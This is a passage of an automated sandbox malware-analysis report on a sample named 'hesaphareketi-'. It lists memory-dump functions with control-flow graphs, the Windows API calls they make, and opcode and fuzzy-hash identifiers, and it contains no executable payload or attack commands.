840->826 845->848 849 49b7d51-49b7d53 846->849 852 49b7dda-49b7e5b 848->852 853 49b7e5e-49b7e71 848->853 849->754 850 49b7d59-49b7d67 849->850 850->754 854 49b7d6d-49b7d76 850->854 852->853 855 49b7e73-49b7ea1 853->855 856 49b7ec5-49b7ecf 853->856 854->845 854->849 855->856 868 49b7ea3-49b7ebf 855->868 868->856 878 49b746e-49b7470 876->878 879 49b7472-49b747c 876->879 877->876 880 49b747e-49b7498 878->880 879->880 883 49b749a-49b749c 880->883 884 49b749e-49b74a6 880->884 886 49b74a8-49b74ad 883->886 884->886 887 49b74af-49b74ba 886->887 888 49b74c0-49b74e9 886->888 887->888 892 49b74eb-49b74f7 888->892 893 49b7524-49b752e 888->893 892->893 896 49b74f9-49b7506 892->896 894 49b7530 893->894 895 49b7537-49b75c3 893->895 894->895 906 49b7605-49b7613 895->906 907 49b75c5-49b7603 895->907 899 49b7508-49b750a 896->899 900 49b750c-49b751f 896->900 899->893 900->893 910 49b761e-49b7666 906->910 907->910 929 49b7669 call 49b83d1 910->929 930 49b7669 call 49b8330 910->930 931 49b7669 call 49b8320 910->931 914 49b766f-49b76ef 927 49b76f5 call 49b8c41 914->927 928 49b76f5 call 49b8c50 914->928 918 49b76fb-49b76fd 919 49b772b-49b7747 918->919 920 49b76ff-49b7729 918->920 923 49b7749 919->923 924 49b7755-49b7756 919->924 920->919 923->924 924->745 927->918 928->918 929->914 930->914 931->914
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$\s]q
                                            • API String ID: 0-2162871153
                                            • Opcode ID: 711d2d1a3f9dcc741c201759af288ba92d83299b1e267de9e7b4ff0d3caf871e
                                            • Instruction ID: 87e38fee0d2cec82400ac56511f4f3e360192bd1bf2c713f2bf97ab3994db994
                                            • Opcode Fuzzy Hash: 711d2d1a3f9dcc741c201759af288ba92d83299b1e267de9e7b4ff0d3caf871e
                                            • Instruction Fuzzy Hash: B5D16F35A1121A8FDB14DFB9D980AADB7F2FFC8305F158669D406EB354DB34A902CB90
                                            Function 049B6E68 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \s]q
                                            • API String ID: 0-3728726972
                                            • Opcode ID: ee51f4d699270e1920cadd3dc58c5c8be11240a865015a48a86d6538e2647335
                                            • Instruction ID: c41e6e3af1b5465b0caa275a4e860dd03396bc52ccdfd8f503c1ef74239370ed
                                            • Opcode Fuzzy Hash: ee51f4d699270e1920cadd3dc58c5c8be11240a865015a48a86d6538e2647335
                                            • Instruction Fuzzy Hash: A5913B78E4020E9FDF14CFA9D585AAEBBF1FF89300F10A665D402EB291DB31A941CB51
                                            Function 049B8330 Relevance: .2, Instructions: 235COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c357034fb60946d4e6879c889c05c8f213ac5402358abe0552b99f11ba68e508
                                            • Instruction ID: 59b9a7a1faab96e9ffb9c7fb7d06f655a54cd66da1f965ffaa50e68493055c26
                                            • Opcode Fuzzy Hash: c357034fb60946d4e6879c889c05c8f213ac5402358abe0552b99f11ba68e508
                                            • Instruction Fuzzy Hash: 07819E32F101259FD714EB69D880A9EB7E7AFC8715F1AC079E44ADB365DA30EC018B80
                                            Function 049B83D1 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dd0351e45eb4ff0de8d87676a52f94932ffed7878126d1d3d5b23aae88540c5
                                            • Instruction ID: 11d69b082a5d09dd984f48ae39dc4e7a55e6be46a730f63ecc014883a94f558d
                                            • Opcode Fuzzy Hash: 1dd0351e45eb4ff0de8d87676a52f94932ffed7878126d1d3d5b23aae88540c5
                                            • Instruction Fuzzy Hash: 23615E32F105259FD714EB69C880A9EB3E7AFC8714F1AC179E4499B365DE70EC028B91
                                            Function 0229D469 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 229d469-229d507 GetCurrentProcess 298 229d509-229d50f 294->298 299 229d510-229d544 GetCurrentThread 294->299 298->299 300 229d54d-229d581 GetCurrentProcess 299->300 301 229d546-229d54c 299->301 303 229d58a-229d5a5 call 229d648 300->303 304 229d583-229d589 300->304 301->300 307 229d5ab-229d5da GetCurrentThreadId 303->307 304->303 308 229d5dc-229d5e2 307->308 309 229d5e3-229d645 307->309 308->309
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0229D4F6
                                            • GetCurrentThread.KERNEL32 ref: 0229D533
                                            • GetCurrentProcess.KERNEL32 ref: 0229D570
                                            • GetCurrentThreadId.KERNEL32 ref: 0229D5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 28845269ceecaf0ef7821965c5fe1018a4c13d4541bb2741180fadd3893ff7c0
                                            • Instruction ID: 41bd283be1a92d6e7841365651cc76c9fcc0eac155db7575506103b55ae06739
                                            • Opcode Fuzzy Hash: 28845269ceecaf0ef7821965c5fe1018a4c13d4541bb2741180fadd3893ff7c0
                                            • Instruction Fuzzy Hash: 455169B09003498FDB14EFA9D648BAEBFF1EF48304F208469D419A7365D739A944CF65
                                            Function 0229D478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 316 229d478-229d507 GetCurrentProcess 320 229d509-229d50f 316->320 321 229d510-229d544 GetCurrentThread 316->321 320->321 322 229d54d-229d581 GetCurrentProcess 321->322 323 229d546-229d54c 321->323 325 229d58a-229d5a5 call 229d648 322->325 326 229d583-229d589 322->326 323->322 329 229d5ab-229d5da GetCurrentThreadId 325->329 326->325 330 229d5dc-229d5e2 329->330 331 229d5e3-229d645 329->331 330->331
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0229D4F6
                                            • GetCurrentThread.KERNEL32 ref: 0229D533
                                            • GetCurrentProcess.KERNEL32 ref: 0229D570
                                            • GetCurrentThreadId.KERNEL32 ref: 0229D5C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: de8a1ef8af5a2677d7ffeaf9d5a65be0faf4911fb5e49ac0a9b446553d1180af
                                            • Instruction ID: bc96a028db0eeecd4f3c17b6191a53a8d00b2cff74125157ff73694cc3726c17
                                            • Opcode Fuzzy Hash: de8a1ef8af5a2677d7ffeaf9d5a65be0faf4911fb5e49ac0a9b446553d1180af
                                            • Instruction Fuzzy Hash: 21515AB09003498FDB14EFAAD648B9EBBF5FF48304F208469D019A7365D739A944CF65
                                            Function 0229B1F0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 977 229b1f0-229b1ff 978 229b22b-229b22f 977->978 979 229b201-229b20e call 229abc4 977->979 980 229b231-229b23b 978->980 981 229b243-229b284 978->981 986 229b210 979->986 987 229b224 979->987 980->981 988 229b291-229b29f 981->988 989 229b286-229b28e 981->989 1034 229b216 call 229b478 986->1034 1035 229b216 call 229b488 986->1035 987->978 990 229b2a1-229b2a6 988->990 991 229b2c3-229b2c5 988->991 989->988 994 229b2a8-229b2af call 229abd0 990->994 995 229b2b1 990->995 993 229b2c8-229b2cf 991->993 992 229b21c-229b21e 992->987 996 229b360-229b420 992->996 997 229b2dc-229b2e3 993->997 998 229b2d1-229b2d9 993->998 1000 229b2b3-229b2c1 994->1000 995->1000 1027 229b428-229b453 GetModuleHandleW 996->1027 1028 229b422-229b425 996->1028 1001 229b2f0-229b2f9 call 229abe0 997->1001 1002 229b2e5-229b2ed 997->1002 998->997 1000->993 1008 229b2fb-229b303 1001->1008 1009 229b306-229b30b 1001->1009 1002->1001 1008->1009 1010 229b329-229b32d 1009->1010 1011 229b30d-229b314 1009->1011 1032 229b330 call 229b779 1010->1032 1033 229b330 call 229b788 1010->1033 1011->1010 1013 229b316-229b326 call 229abf0 call 229ac00 1011->1013 1013->1010 1014 229b333-229b336 1017 229b359-229b35f 1014->1017 1018 229b338-229b356 1014->1018 1018->1017 1029 229b45c-229b470 1027->1029 1030 229b455-229b45b 1027->1030 1028->1027 1030->1029 1032->1014 1033->1014 1034->992 1035->992
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0229B446
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: de31daf30702046a87fceea1beb1655a657290cf6c056c5571f2924e9ee052d1
                                            • Instruction ID: 619b8304f127b21973e2cc0c4b6052ecd88a319526bbba14b0f504678df82bc1
                                            • Opcode Fuzzy Hash: de31daf30702046a87fceea1beb1655a657290cf6c056c5571f2924e9ee052d1
                                            • Instruction Fuzzy Hash: 7F714670A10B058FDB24DFA9E05475ABBF5FF88304F00892DD44ADBA54D775E945CB90
                                            Function 049B1CE4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1036 49b1ce4-49b1d56 1037 49b1d58-49b1d5e 1036->1037 1038 49b1d61-49b1d68 1036->1038 1037->1038 1039 49b1d6a-49b1d70 1038->1039 1040 49b1d73-49b1dab 1038->1040 1039->1040 1041 49b1db3-49b1e12 CreateWindowExW 1040->1041 1042 49b1e1b-49b1e53 1041->1042 1043 49b1e14-49b1e1a 1041->1043 1047 49b1e60 1042->1047 1048 49b1e55-49b1e58 1042->1048 1043->1042 1049 49b1e61 1047->1049 1048->1047 1049->1049
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049B1E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 0a63e1312ad2c36613a05779469e8c7a0f6c9de575ed1d5e2dce6d623ac94b48
                                            • Instruction ID: 80fae1895c114a11edde47f1d4239935f8b871724943b6713f5889b0a1002028
                                            • Opcode Fuzzy Hash: 0a63e1312ad2c36613a05779469e8c7a0f6c9de575ed1d5e2dce6d623ac94b48
                                            • Instruction Fuzzy Hash: 9251C0B1D00349DFDF14CF99C985ADEBBB6BF48350F24812AE819AB210D775A845CF90
                                            Function 049B1CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1050 49b1cf0-49b1d56 1051 49b1d58-49b1d5e 1050->1051 1052 49b1d61-49b1d68 1050->1052 1051->1052 1053 49b1d6a-49b1d70 1052->1053 1054 49b1d73-49b1e12 CreateWindowExW 1052->1054 1053->1054 1056 49b1e1b-49b1e53 1054->1056 1057 49b1e14-49b1e1a 1054->1057 1061 49b1e60 1056->1061 1062 49b1e55-49b1e58 1056->1062 1057->1056 1063 49b1e61 1061->1063 1062->1061 1063->1063
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049B1E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: a45a3b49e7b78e907dce34456fe53839ac073b5fbcbc9d353cbb2f2041b8898c
                                            • Instruction ID: 8f39b566c3e46cb94797972876a31968e569a99a4f96d591bd9cfaa05abc3e73
                                            • Opcode Fuzzy Hash: a45a3b49e7b78e907dce34456fe53839ac073b5fbcbc9d353cbb2f2041b8898c
                                            • Instruction Fuzzy Hash: 7841B0B1D00309DFDF14CF99C995ADEBBB5BF88350F24812AE819AB210D775A945CF90
                                            Function 049B0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1064 49b0bfc-49b42fc 1067 49b43ac-49b43cc call 49b0ad4 1064->1067 1068 49b4302-49b4307 1064->1068 1075 49b43cf-49b43dc 1067->1075 1069 49b435a-49b4392 CallWindowProcW 1068->1069 1070 49b4309-49b4340 1068->1070 1072 49b439b-49b43aa 1069->1072 1073 49b4394-49b439a 1069->1073 1078 49b4349-49b4358 1070->1078 1079 49b4342-49b4348 1070->1079 1072->1075 1073->1072 1078->1075 1079->1078
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 049B4381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 0faaaa4944401647f111990f4d2488a0254ac3f58ae4d7e09962de80c3d3bc05
                                            • Instruction ID: 583cc320c1ab43b5890023fd6ae6e01e2c89724978ef766573851c7806d5a233
                                            • Opcode Fuzzy Hash: 0faaaa4944401647f111990f4d2488a0254ac3f58ae4d7e09962de80c3d3bc05
                                            • Instruction Fuzzy Hash: 2F4129B4A00309DFDB14CF99C548AAABBF5FF88314F24C469D559A7321D375A841DBA0
                                            Function 022947C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1081 22947c4-2295d91 CreateActCtxA 1084 2295d9a-2295df4 1081->1084 1085 2295d93-2295d99 1081->1085 1092 2295e03-2295e07 1084->1092 1093 2295df6-2295df9 1084->1093 1085->1084 1094 2295e09-2295e15 1092->1094 1095 2295e18 1092->1095 1093->1092 1094->1095 1097 2295e19 1095->1097 1097->1097
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02295D81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: f48c5b34a170022b652a1915c4ec859046156b9da87e7bfa7e2b865720a53417
                                            • Instruction ID: e70c85371f0fe3852f48a2caab53060952e52d52de9d5d345473584cafc2dbd1
                                            • Opcode Fuzzy Hash: f48c5b34a170022b652a1915c4ec859046156b9da87e7bfa7e2b865720a53417
                                            • Instruction Fuzzy Hash: CB41EFB0D0061DCBDF25DFA9C948B9EBBF5BF48304F20806AD418AB258DB756949CF91
                                            Function 02295CC4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02295D81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 4c8f753d4ce5c14ed12ee51382baaa19b8c2664872ecfa4880dda008442e5c1b
                                            • Instruction ID: a829ba144ed6c8d728629f1831b498355899cb075c8ae72d1b317aca2bd6286e
                                            • Opcode Fuzzy Hash: 4c8f753d4ce5c14ed12ee51382baaa19b8c2664872ecfa4880dda008442e5c1b
                                            • Instruction Fuzzy Hash: 2C41E0B0D00619CFDF25DFA9C988ACDBBF5BF48304F20806AD418AB255DB75694ACF91
                                            Function 0229D6B8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0229D747
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 0ad698f9c15771ba1d00ad333c4e04d216ab018b9cfcd1ad90b7939e7d43a8d5
                                            • Instruction ID: fe2fe090585e30d75278c1328bdfdbb2d74a30614464c791de459560d336a91e
                                            • Opcode Fuzzy Hash: 0ad698f9c15771ba1d00ad333c4e04d216ab018b9cfcd1ad90b7939e7d43a8d5
                                            • Instruction Fuzzy Hash: 642103B59002499FDB10CF9AD984ADEBFF4FB48320F10801AE918A7350C379A941CFA1
                                            Function 0229D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0229D747
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 574a80f379c340a9549f10cec7858f152a31465fc260a5717301df01ed8db883
                                            • Instruction ID: d0994baaedca3f4bce37fb59796338a492e49c08c6975a8d043ddb2e3bf4d20e
                                            • Opcode Fuzzy Hash: 574a80f379c340a9549f10cec7858f152a31465fc260a5717301df01ed8db883
                                            • Instruction Fuzzy Hash: 9821E4B59002089FDF10CF9AD984ADEBBF9FB48310F14801AE918A3310C379A940CFA1
                                            Function 0229B660 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0229B4C1,00000800,00000000,00000000), ref: 0229B6D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 3c91161e41389ec9b57f9593d339c5b38edc2c1d2686d8d11cfb0021af9f8bd1
                                            • Instruction ID: 7b5a8428e89cbfc93cc824c7633970a66cd31dd69bd42edb29b99c463e74b1b7
                                            • Opcode Fuzzy Hash: 3c91161e41389ec9b57f9593d339c5b38edc2c1d2686d8d11cfb0021af9f8bd1
                                            • Instruction Fuzzy Hash: 511114B69002098FDF10DF9AD884ADEFBF4EF48314F10842ED529A7240C379A546CFA5
                                            Function 0229AC28 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0229B4C1,00000800,00000000,00000000), ref: 0229B6D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 6539afabf73250978617cdfe01448ea26374c265ed75184c914bb61ec8c860a7
                                            • Instruction ID: 5d1544a19bc6e86bcf64f2e4d052d5023d6b512d50f266586ffadf4cf7b74db2
                                            • Opcode Fuzzy Hash: 6539afabf73250978617cdfe01448ea26374c265ed75184c914bb61ec8c860a7
                                            • Instruction Fuzzy Hash: A01114B69003099FDF10DF9AD444A9EFBF4EB48314F10842ED519A7200C379A944CFA4
                                            Function 0229B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0229B446
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 81d5a4928a3e6f84e2ad278b8f55266145aba54f7151ae2ea07a1d14a3fc1138
                                            • Instruction ID: 54f1ed412c6639f0f1b8615b1e2e703b50244d88fd0f01d20d6be6472e69e1ee
                                            • Opcode Fuzzy Hash: 81d5a4928a3e6f84e2ad278b8f55266145aba54f7151ae2ea07a1d14a3fc1138
                                            • Instruction Fuzzy Hash: 68110FB5C002498FDB10DF9AD444A9EFBF4AF89314F10845AD829A7200C379A545CFA1
                                            Function 00B9D650 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2d9c767fae3d0d72825bfe0ddef469edd6e39c85c6d6ee1e2591205744a0622
                                            • Instruction ID: 5ad45c3ee9dc6e8b08ba1d95b182293d0e8133139eedcbbb9b3a1b7bb3f34d0d
                                            • Opcode Fuzzy Hash: f2d9c767fae3d0d72825bfe0ddef469edd6e39c85c6d6ee1e2591205744a0622
                                            • Instruction Fuzzy Hash: AF21F1B2500244DFCF059F54D9C0F26BFA5FB98314F2486B9E9490B256C33AD816DBA1
                                            Function 00B9D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 188ec556da449c4216e4bdf9760740196442f0f9be4f84a45becc8696b622bdd
                                            • Instruction ID: 4980369224cdac06f9e8fa352ff074a5bb6f056db41539ef737f45ebc2e2314c
                                            • Opcode Fuzzy Hash: 188ec556da449c4216e4bdf9760740196442f0f9be4f84a45becc8696b622bdd
                                            • Instruction Fuzzy Hash: 8921FF71500240DFDF05DF14D9C0B26BFA5FBA8318F20C5B9E9090B266C33AD816DBA2
                                            Function 00BAD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
                                            • Instruction ID: eff49fffa30d6cf41ae87b146dd37947e36621e36e40b4bd36967efb60652c6f
                                            • Opcode Fuzzy Hash: ef70ca2851f71a5133c32347c9e7f15d7da3529a443b6f5268a9a47dea688fe2
                                            • Instruction Fuzzy Hash: 8B21F271608204DFCB24DF24D9D4B26BFA5FB89314F20C5ADD94A4B696C33AD807CA61
                                            Function 00BAD1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
                                            • Instruction ID: c848d6b452d025359c6a2c0db689c1f4b2925d14815c411b9c5b92abba289861
                                            • Opcode Fuzzy Hash: 8331c839963fb6d6f2e0bd8c87bb31a0786d8a332b8baeb73b38d94578bc8c43
                                            • Instruction Fuzzy Hash: B9210471608304EFDB05DF24D9C0F26BBA5FB89314F20C5ADE90A4B696C33AD806CA61
                                            Function 00BAD006 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
                                            • Instruction ID: 4708b0af4a2130720381ad75ac8aeeb6fcf444bceeff7f6079d8b8ec41e57e4b
                                            • Opcode Fuzzy Hash: 5733e3eca8a29fa10c9803b95199349ef25cd05ff657ac3a976f41fd1175dcb2
                                            • Instruction Fuzzy Hash: 302184755093808FDB16CF24D594715BFB1EB46314F28C5DAD8498B697C33AD80ACB62
                                            Function 00B9D64B Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction ID: 11a66d7429030ba8dd63af470ccf8dbf92787ca28257738a104963e675bf0b79
                                            • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction Fuzzy Hash: C821A276504280DFCF06CF54D9C4B16BFB2FB98314F24C6A9D9490B256C33AD816DB91
                                            Function 00B9D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
